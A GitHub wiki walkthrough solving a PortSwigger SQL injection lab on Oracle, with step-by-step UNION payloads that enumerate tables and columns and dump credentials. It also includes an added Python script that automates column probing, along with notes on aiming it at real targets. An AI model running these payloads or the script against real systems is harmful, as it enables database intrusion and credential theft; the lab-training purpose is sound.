SQL injection attack, listing the database contents on Oracle - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki
Hello, let's start!
Access the lab, choose the Gifts category, intercept the request in Burp, and send it to Repeater.
Now start testing.
The first step is to detect the SQL injection by provoking a database error. In this lab we already know the category parameter is injectable, but in a real test you have to find out whether a parameter is vulnerable: send input that breaks the query syntax and check whether the database returns an error. An error is a strong indicator of injection. The character that breaks the syntax differs from one application to another, so try a single quote ', a double quote ", a slash /, and URL-encoded variants of them (for example %27 for the single quote).
Note: every parameter is vulnerable until proven otherwise.
Now I send a single quote ' to see what happens.
We get an error, so the parameter may be vulnerable to SQL injection.
PortSwigger makes this easier by telling us the database is Oracle; in the real world you would have to fingerprint the database yourself, and test every parameter. Next we need to determine how many columns the original query returns. We do this with UNION SELECT: the UNION operator appends the rows of a second SELECT to the results of the original query, which is how we retrieve data from other tables through the vulnerable parameter. In Oracle every SELECT needs a FROM clause, so the injected query must select from the DUAL table. DUAL is a built-in Oracle table owned by SYS that contains exactly one row and one column, so it is the standard table to select from when you only need literals.
The syntax is as follows:
'UNION+SELECT+NULL,NULL+FROM+DUAL--
- UNION: this operator combines the result sets of two or more SELECT statements into a single result set, discarding duplicate rows (UNION ALL would keep them).
- SELECT NULL,NULL: the injected SELECT returns two columns, both NULL. NULL is used because it is compatible with every data type, so a type mismatch cannot cause an error while we are still counting columns.
- FROM DUAL: Oracle requires a FROM clause on every SELECT; DUAL supplies the single row the injected SELECT needs.
- --: a SQL comment. It neutralises the rest of the original query (including the application's own closing quote), so everything after it is ignored.
Now we determine the number of columns by adding one NULL at a time, always ending the query with FROM DUAL. Follow along.
The response comes back normally, which indicates the original query returns two columns. If you add a third NULL you get an error, because the column count has to match exactly: it is two, not three.
Next we need to find which columns have a string data type, because the usernames and passwords we want are text. Put a string in a column and send the request: if the response is OK the column is compatible with strings; if you get an error the column has some other type.
The query is as follows:
'UNION+SELECT+'asd','asd'+FROM+DUAL--
The response is OK, so both columns accept strings and we can use both of them to extract usernames and passwords.
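To make the probing steps above repeatable, here is an added example (my own code, not from the original wiki or from PortSwigger) that automates the three checks just performed: the quote break, counting columns with NULLs, and finding which columns accept strings. Every probe goes through a `send` callback, so the same logic can be pointed at a real endpoint; the `fake_gifts_endpoint` target below is a constructed stand-in that mimics this lab (Oracle back end, two string columns) and surfaces Oracle errors as HTTP 500, which is an assumption about how the lab reports them. It probes one column at a time, which is more general than the page's 'asd','asd' payload, and it also produces the `+`-encoded form of the payloads shown above.

```python
"""Automated UNION-based column enumeration for SQL injection (Oracle dialect).

Added example for this walkthrough, not code from the original page.  Every
probe goes through a `send(param_value) -> (status, body)` callback so the
same logic can be pointed at a real endpoint; `fake_gifts_endpoint` is a
constructed stand-in for the lab's category filter (assumption: an Oracle
back end whose original query returns two VARCHAR2 columns, and database
errors surface as HTTP 500).
"""
import re
from typing import Callable, List, Optional, Tuple
from urllib.parse import quote_plus

Sender = Callable[[str], Tuple[int, str]]

# Oracle requires a FROM clause on every SELECT; the other engines do not.
DIALECT_SUFFIX = {"oracle": " FROM DUAL", "mysql": "", "postgresql": "", "mssql": ""}


def union_payload(values: List[str], dialect: str = "oracle") -> str:
    """Build 'UNION SELECT v1,v2,...[ FROM DUAL]-- for the given column values."""
    return "'UNION SELECT " + ",".join(values) + DIALECT_SUFFIX[dialect] + "--"


def to_query_value(payload: str) -> str:
    """Encode the payload the way the page writes it: spaces as '+', quotes kept.
    (A real client would usually percent-encode the quote as %27.)"""
    return quote_plus(payload, safe="',")


def detect_error(send: Sender) -> bool:
    """Step 1: an unbalanced single quote that breaks the query is the first signal."""
    status, _ = send("'")
    return status >= 500


def find_column_count(send: Sender, dialect: str = "oracle", max_columns: int = 20) -> Optional[int]:
    """Step 2: add NULLs one at a time until the UNION stops erroring.
    NULL is compatible with every type, so only the column count can fail here."""
    for n in range(1, max_columns + 1):
        status, _ = send(union_payload(["NULL"] * n, dialect))
        if status == 200:
            return n
    return None


def find_string_columns(send: Sender, count: int, dialect: str = "oracle", marker: str = "asd") -> List[int]:
    """Step 3: put a string literal in one column at a time; a 200 whose body
    echoes the marker means that column can carry the text we want to extract."""
    hits = []
    for i in range(count):
        values = ["NULL"] * count
        values[i] = f"'{marker}'"
        status, body = send(union_payload(values, dialect))
        if status == 200 and marker in body:
            hits.append(i)
    return hits


# ---- constructed stand-in for the lab target (assumption, not the real lab) ----
ORIGINAL_TYPES = ["VARCHAR2", "VARCHAR2"]  # the lab's query returns two text columns


def fake_gifts_endpoint(category: str) -> Tuple[int, str]:
    """Model of /filter?category=... backed by Oracle. Returns (status, body)."""
    if "'" not in category:
        return 200, "<h1>Gifts</h1>"
    m = re.fullmatch(r"'UNION SELECT (.+) FROM DUAL--", category)
    if not m:
        return 500, "ORA-01756: quoted string not properly terminated"
    values = [v.strip() for v in m.group(1).split(",")]
    if len(values) != len(ORIGINAL_TYPES):
        return 500, "ORA-01789: query block has incorrect number of result columns"
    for v, col_type in zip(values, ORIGINAL_TYPES):
        if v.upper() == "NULL":
            continue
        is_string = len(v) >= 2 and v[0] == v[-1] == "'"
        if is_string != (col_type == "VARCHAR2"):
            return 500, "ORA-01790: expression must have same datatype as corresponding expression"
    shown = [v.strip("'") for v in values if v.upper() != "NULL"]
    return 200, "<h1>Gifts</h1>" + "".join(f"<p>{s}</p>" for s in shown)


def enumerate_target(send: Sender, dialect: str = "oracle") -> dict:
    """Run the three steps in order and report what was learned."""
    result = {"error_on_quote": detect_error(send), "columns": None, "string_columns": []}
    if not result["error_on_quote"]:
        return result
    result["columns"] = find_column_count(send, dialect)
    if result["columns"]:
        result["string_columns"] = find_string_columns(send, result["columns"], dialect)
    return result


if __name__ == "__main__":
    print(enumerate_target(fake_gifts_endpoint))
    # The payload strings used on this page, as they appear on the wire:
    print(to_query_value(union_payload(["NULL", "NULL"])))
    print(to_query_value(union_payload(["'asd'", "'asd'"])))
```

To use it against a real target, replace `fake_gifts_endpoint` with a function that puts its argument into the vulnerable parameter, sends the request, and returns the status code and body. Keep `max_columns` modest and watch for a target that never returns 200: that usually means the injection point needs a different closing sequence, not more columns.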
Now we need the Oracle-specific syntax to list table names, and then the names of the username and password columns.
PortSwigger has a cheat sheet of database-specific syntax; check this link: https://portswigger.net/web-security/sql-injection/cheat-sheet
Another way is to look up the system views the database uses to describe its own tables and columns.
Every database engine ships with a fixed set of system tables or views, each with fixed columns, that hold metadata about every table and column in the database. In MySQL, PostgreSQL and SQL Server this metadata lives in INFORMATION_SCHEMA. Oracle does not have INFORMATION_SCHEMA; its equivalent is the data dictionary, exposed through views such as ALL_TABLES and ALL_TAB_COLUMNS.
Here is the Oracle syntax for retrieving table names.
For more information about INFORMATION_SCHEMA see this link (https://docs.oracle.com/cd/E19078-01/mysql/mysql-refman-5.0/information-schema.html). Note that this page documents MySQL, not the Oracle database, even though it is hosted on docs.oracle.com; it is still useful for understanding the concept.
In it, choose "The INFORMATION_SCHEMA TABLES Table".
The TABLES table provides information about tables in databases. The Oracle counterpart is the ALL_TABLES view, whose TABLE_NAME column holds the name of every table accessible to the current user.
Now that we know the view name and the syntax, the query is as follows.
'UNION+SELECT+NULL,table_name+FROM+all_tables--
- Explanation: the query UNION SELECT NULL,table_name FROM all_tables-- lists the names of the tables the current user can access, since all_tables is an Oracle data dictionary view containing one row per accessible table. Note that this query only retrieves table names, not column names.
- UNION: combines the results of two SELECT statements into a single result set.
- SELECT NULL: the first column of the injected SELECT is NULL. This keeps the injected SELECT at the same number of columns as the original query, which the UNION operator requires.
- table_name FROM all_tables: selects the TABLE_NAME column of the all_tables view, i.e. the name of every table accessible to the current user. (USER_TABLES lists only tables owned by the current user; DBA_TABLES lists every table in the database but needs elevated privileges.)
- --: a SQL comment that terminates the query so the rest of the original statement is not executed. Anything after -- is ignored.
Copy the URL and browse to it; you will see all the tables accessible in the Oracle database.
The result is long, but we only want the users table.
Now that we know the table name, we build a new query to find the names of the username and password columns.
Go back to the same link and look at the COLUMNS table: https://docs.oracle.com/cd/E19078-01/mysql/mysql-refman-5.0/information-schema.html#tables-table (again, this describes MySQL; the Oracle equivalent is the ALL_TAB_COLUMNS view).
Now choose the columns view
and adapt the syntax from the PortSwigger cheat sheet https://portswigger.net/web-security/sql-injection/cheat-sheet
The query is as follows:
'UNION+SELECT+NULL,COLUMN_NAME+FROM+all_tab_columns+WHERE+table_name='USERS_VLUVKU'--
- Explanation:
- UNION: combines the results of two SELECT statements into a single result set.
- SELECT NULL: the first column of the injected SELECT is NULL, keeping the column count equal to the original query's, which the UNION operator requires.
- COLUMN_NAME FROM all_tab_columns: selects the COLUMN_NAME column of the all_tab_columns data dictionary view, which has one row per column of every table accessible to the current user.
- WHERE table_name='USERS_VLUVKU': filters the result to the columns of the USERS_VLUVKU table. Note that Oracle stores unquoted identifiers in upper case and the string comparison is case-sensitive, so the table name must be written exactly as it appeared in the all_tables output (upper case here); a lower-case 'users_vluvku' would return no rows.
- --: a SQL comment that terminates the query so the rest of the original statement is not executed. Anything after -- is ignored.
Copy the URL and browse to it; you will see the column names:
PASSWORD_HPWZVP USERNAME_ABETVA
Now we have the table name (USERS_VLUVKU), the username column (USERNAME_ABETVA) and the password column (PASSWORD_HPWZVP).
Let's build the last query to get the administrator's password.
The query is as follows.
'UNION+SELECT+USERNAME_ABETVA,PASSWORD_HPWZVP+FROM+USERS_VLUVKU--
- Explanation:
- UNION: combines the results of two SELECT statements into a single result set.
- SELECT USERNAME_ABETVA,PASSWORD_HPWZVP: the injected SELECT returns the two columns that hold the usernames and passwords. Both are strings, which is why we checked the column types earlier.
- FROM USERS_VLUVKU: the table the injected SELECT reads from.
- --: a SQL comment that terminates the query so the rest of the original statement is not executed. Anything after -- is ignored.
Now copy the link and browse to it; you will see the usernames and passwords:
administrator | 7xslowm2238yot0mzq1t
To solve the lab, log in as administrator with that password.
Lab solved, thank you 🥇